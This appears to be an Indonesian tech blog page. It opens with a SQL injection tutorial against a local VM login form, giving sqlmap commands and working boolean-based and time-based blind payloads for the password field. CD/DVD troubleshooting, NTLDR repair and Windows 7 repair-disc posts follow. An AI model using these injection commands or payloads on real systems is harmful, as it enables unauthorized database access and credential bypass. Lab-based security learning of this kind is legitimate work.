Tutorial SQL Injection Level 4

Tutorial SQL Injection Level 4 - Kali ini saya akan memberikan sedikit pelajaran mengenai SQL Injection level 4. Pada tutorial kali ini, saya tidak menggunakan live target, karena saya rasa itu bersifat merusak. Sehingga saya coba metode ini di localhost dengan bantuan VMware. :D

Bahan - Bahan Yang Akan Kita Gunakan Pada  Tutorial SQL Injection Level 4 :

1. Mozilla Firefox *
2. Tamper Data *
3. SQLmap * 

1. Menguji vulnerability

Kali ini, vmware saya telah berjalan dan memiliki ip address 172.16.33.131. Saya buka firefox, kemudian saya masukan IP address 172.16.33.131 pada address bar.

  Setelah Itu Test Login Dengan :

Username : admin Password : admin

Kemudian Hasil-nya :

Kita berada di halaman checklogin.php . Disini tidak ada parameter untuk diuji. Mungkin saya bisa menguji data yang dikirim ke server. Saya kembali lagi ke halaman login. Dengan Username Dan Password : 

Username : admin Password : '

Dan Hasilnya :

Kelihatannya website ini Vulnerable . Namun tetap tidak ada parameter. Sehingga dapat disimpulkan bahwa vulnerability bukan terletak pada parameter, melainkan DATA. Untuk mengecek data yang dikirim ke server, saya gunakan Tamper Data .

2. Tamper Data In Action 

Jika anda belum memiliki tamper data, anda bisa Mendownloadnya Lewat link ini >>. Namun add-on ini hanya dapat digunakan di Mozilla Firefox. Dan tidak dapat digunakan di Browser lain.

Setelah menginstall, tamper data dapat diaktifkan di Tools --> Tamper Data

  

Kembali ke halaman login Dengan Username & Password : 

Username : admin Password : 123

Maka tamper data akan mengambil setiap data yang terjadi selama proses transfer data dari client ke server, maupun sebaliknya.

OK. Saya temukan POSTDATA=myusername=admin&mypassword=123&Submit=Login. Ternyata ada 3 data di sini. yaitu myusername, mypassword, dan Submit. Dan kita telah mengetahui bahwa data password vulnerable. Selanjutnya kita akan gunakan SQLmap untuk menguji database menggunakan informasi yang telah kita dapatkan.

3. SQLmap in Attack

  

red-dragon [~] >> cd /pentest/database/sqlmap/                                                           red-dragon [/pentest/database/sqlmap] >> python sqlmap.py -u http://172.16.33.131/checklogin.php --data="POSTDATA=myusername=admin&mypassword=123&Submit=Login" -p mypassword --flush-session

Keterangan :

-u = url [Pesan error muncul pada halaman checklogin.php]

--data = [Kali ini kita akan memberikan data pada server dengan cara tampering / menyuap]

-p = parameter [Parameter yang vulnerable adalah mypassword

--flush-session = Bagian ini tidak masalah jika tidak disertakan.

Muncul pertanyaan :

parsed error message(s) showed that the back-end DBMS could be MySQL. Do you want to skip test payloads specific for other DBMSes? [Y/n]

Saya tekan "n" [tanpa tanda kutip], kemudian "enter"

Kemudian muncul lagi :

sqlmap got a 302 redirect to 'http://172.16.33.131:80/login_success.php'. Do you want to follow? [Y/n]

Saya tekan "n" [tanpa tanda kutip], kemudian "enter"

dan berujung pada CRITICAL :

[CRITICAL] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. As heuristic test turned out positive you are strongly advised to continue on with the tests. Please, consider usage of tampering scripts as your target might filter the queries. Also, you can try to rerun by providing either a valid --string or a valid --regexp, refer to the user'smanual for details 

4. Over

Saya coba naikan level dan risk pada testing SQLmap menjadi 5.  

red-dragon [/pentest/database/sqlmap] >> python sqlmap.py -u http://172.16.33.131/checklogin.php --data="POSTDATA=myusername=admin&mypassword=123&Submit=Login" -p mypassword --level=5 --risk=5

Kemudian muncul lagi:

sqlmap got a 302 redirect to 'http://172.16.33.131:80/login_success.php'. Do you want to follow? [Y/n]

Saya tekan "n" [tanpa tanda kutip], kemudian "enter"

Dan muncul pesan yang membahagiakan:

POST parameter 'mypassword' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 

Saya jawab "n", kemudian "enter".

Dan payload untuk website ini adalah: 

Place: POST Parameter: mypassword Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: POSTDATA=myusername=admin&mypassword=-3973' OR (5599=5599) AND 'eHOv'='eHOv&Submit=Login Type: AND/OR time-based blind Title: MySQL < 5.0.12 AND time-based blind (heavy query) Payload: POSTDATA=myusername=admin&mypassword=123' AND 2246=BENCHMARK(5000000,MD5(0x77544b50)) AND 'bGtM'='bGtM&Submit=Login

Read More

Troubleshooting CD/DVD Rom

CD/DVD Rom tidak mau membaca

Bersihkan head CD/DVD Rom

cd cleaner

Seringkali saya mendapati pertanyaan,  CD/DVD Rom saya gak bisa baca ? padahal saya baru beli 2-3 bulan lalu, pertanyaan pertama yang saya ajukan adalah apakah headnya pernah dibersihkan ?, emang perlu dibersihkan ya ?, ya perlu lah. Head pada CD/DVD Rom memiliki fungsi yang sama seperti mata, jika head/mata kotor maka penglihatan kita akan buram atau tidak jelas, begitu juga head CD/DVD Rom, sinar laser yang dihasilkan oleh head dapat terhalang oleh debu yang mengakibatkan pembacaan CD/DVD jadi tidak lancar. Solusinya, beli pembersih CD/DVD Rom, biasanya dilengkapi dengan alkohol, cara pakainya gampang, kalau tidak bisa boleh komentar dibawah.

Bersihkan CD/DVD

Seringkali saya dapati permukaan CD/DVD terdapat lemak atau bekas cetakan tangan, hal ini sangat membuat CD/DVD Rom akan cepat rusak, karena head akan dipaksa untuk membaca CD/DVD, oleh karena itu sebelum CD/DVD dimasukkan kedalam drive, pastikan bebas kotor dan lemak. Untuk membersihkan lemak atau bekas cetakan tangan dapat menggunakan pembersih cd yang banyak dijual di toko komputer.

CD/DVD Rom tidak mau eject

eject cd rom

Pernah mengalami CD/DVD macet tidak mau dikeluarkan dari dalam drive ?, tentu dong, kalau ini terjadi, gampang aja, ambil penjepit kertas, kemudian sambil menekan tombol eject, masuk dan tekan lubang kecil yang terdapat di drive CD/DVD rom.

CD/DVD Rom tidak terdetek

Permasalahan yang sering saya temui, yang ini relatif mudah, pertama cek apakah lampu indikator pada CD/DVD Rom menyala, jika tidak berarti adalah masalah power, coba ganti power yang terhubung ke CD/DVD Rom dengan kabel power yang lain, tentunya harus buka casing dulu. Jika sudah nyala namun tidak terdeteksi langkah selanjutnya adalah mengecek kabel IDE, kabel ukuran flexi ukuran besar yang menempel disamping kabel power, coba ganti dengan kabel IDE yang lain, biasanya dengan menggunakan dua langkah ini CD/DVD Rom terdeteksi kembali, jika tidak maka ada kerusakan hardware dan kamu harus beli yang baru hhe.

Read More

Memperbaiki error NTLDR is missing

Artikel ini terinspirasi ketika saya memperbaiki laptop kedua orang kawan saya, sebut saja namanya si fulan, “kin, laptop tiba-tiba muncul NTLD is missing, padahal gak diapa-apain, muncul aja tiba-tiba”, “kok bisa”, jawab saya, “kalau tahu gak bakal tanya sama kinta :p “, “huff, capek dech”.

Mengalami hal yang serupa juga kawan ?, berikut solusinya.

Pesan error NTLDR

Saya pernah mendapati beberapa pesan error NTLDR, diantaranya :

“NTLDR is missing
Press any key to restart”

“NTLDR is missing
Press Ctrl Alt Del to restart”

“Boot: Couldn’t find NTLDR
Please insert another disk”

Dan yang paling sering saya dapati adalah yang nomor 2, ”NTLDR is missing, Press Ctrl + Alt + Del to restart”. Pesan error NTLDR terjadi setelah proses POST (Power On Self Test) selesai atau setelah proses pengecekan hardware.

Penyebab munculnya pesan error NTLDR is missing

Berdasarkan pengalaman ada beberapa sebab mengapa pesan error NTLDR muncul, diantara :

1. PC melakukan boot pada USB,CD atau Hard Drive yang tidak memiliki boot sector.
2. Sistem Windows mengalami corrupt.
3. Ada kesalahan pada konfigurasi boot file.
4. Kabel IDE/Sata rusak, sehingga data tidak mengalir dengan sempurna.
5. Proses upgrade windows tidak sempurna.

Solusi memperbaiki pesan error NTLDR is missing

1. Jika beruntung, cukup merestart PC/Laptop pesan NTLR is missing dapat hilang.
2. Periksa apakah ada USB, CD atau Media lain yang terhubung ke PC/Laptop, jika ada cabut, hal ini untuk mencegah boot dari media tersebut.
3. Periksa BIOS, apakah boot pertama dari Hard Drive yang memiliki boot sector atau terinstall windows didalamnya.
4. Ketiga cara diatas adalah P3Kom saya dalam memperbaiki error NTLDR, jika tidak bisa maka saya memakai cara yang selalu ampuh, berikut tahapannya.

Cara ampuh memperbaiki pesan NTLR is missing

1. Persiapkan CD Windows dan masukkan ke dalam CD/DVD Drive
2. Restart PC/Laptop dan buat agar boot pertama dari CD/DVD Drive.
3. Tekan enter pada pesan “press anykey to boot from CD”.
4. Setelah masuk ke Setup Menu, tekan ”R” untuk masuk ke repair command line.
5. Selanjutnya akan ditanya, dimana letak sistem windowsnya, muncul pilihan angka, pilih angka yang terdapat sistem windows, contoh : jika di drive C maka pilih angka 1.
6. Selanjutnya akan ditanya password administrator, ketikkan dan enter.
7. Sekarang kita akan mengcopy file NTLDR & NTDETECT.com kedalam sistem. Misal CD/DVD drive kamu adalah drive D, maka perintahnya

Copy d:\i38\ntldr c:\
Copy d:\i38\ntdetect.com c:\

• Jika berhasil maka akan ada tulisan “2 file copied”.
• Restart dan pilih boot dari Harddisk pertama.
• Voila PC/Laptop kamu sudah sehat kembali.

Read More

Cara Membuat CD Repair Windows 7

Setiap Microsoft mengeluarkan operating system baru (termasuk Windows 7), mereka mengklaim kalau sistem operasi tersebut lebih stabil dari pendahulunya. Meskipun demikian, anda tidak akan pernah tahu suatu saat system yang stabil tersebut akan mengalami masalah. Alangkah lebih baik jika anda melakukan antisipasi guna meminimalisir akibat yang ditimbulkan oleh Windows 7 saat mengalami masalah.
Salah satu solusi persiapan yang dapat anda lakukan untuk mengantisipasi kerusakan tersebut adalah dengan cara membuat sebuah CD repair Windows 7 yang dapat digunakan untuk booting saat operating system mengalami masalah. Windows 7 punya sebuah fitur yang dapat digunakan untuk membuat sebuah CD repairdengan langkah yang mudah.
Langkah kerjanya adalah sebagai berikut :

• Klik Start, kemudian ketik system repair disc klik Create a System Repair Disc.
  
  
  
• Akan keluar window Create a System Repair Disc. Pilih media disc yang akan dipakai.
  
• Masukkan sebuah kepingan CD kosong ke dalam DVD/CD RW dan lanjutkan dengan klik tombol Create disc.
• Setelah selesai, keluarkan kepingan CD yang telah anda buat dari DVD/CD RW

Sekarang anda punya kepingan CD yang dapat digunakan sebagai repair dis Windows 7 di komputer atau notebook anda.
Lalu, bagaimana menggunakan repair disc yang telah dibuat?

• Booting komputer atau notebook anda menggunakan kepingan CD yang telah anda buat. Pilih Windows Setup [EMS Enabled]untuk masuk ke dalam menu system repair.
  
• Setelah proses booting selesai, anda bisa mengakses tool System Recovery Options dan mengembalikan Image System file yang telah anda buat sebelumnya. (Baca artikel kami sebelumnya tentang Bagaimana Cara Membuat System Image di Windows 7).
  
• Sekarang anda dapat memilih jenis recovery yang akan dijalankan untuk memulihkan sistem operasi Windows 7 pada notebook atau PC sesuai dengan kondisi kerusakan system yang anda hadapi. Jika ingin menggunakan image system yang telah dibuat, klik System Image Recovery dan ikuti langkah-langkah beriutnya ssuai dengan petunjuk yang disediakan.
  
  
  
  

Meskipun tidak pernah diingnkan, anda tidak akan pernah tahu kapan sistem operasi windows 7 mengalami masalah. Sebuah langkah yang bijak jika mau meluangkan waktu untuk membuat sebuah CD repair yang akan bermanfaat saat notebook ata PC anda bermasalah.

Read More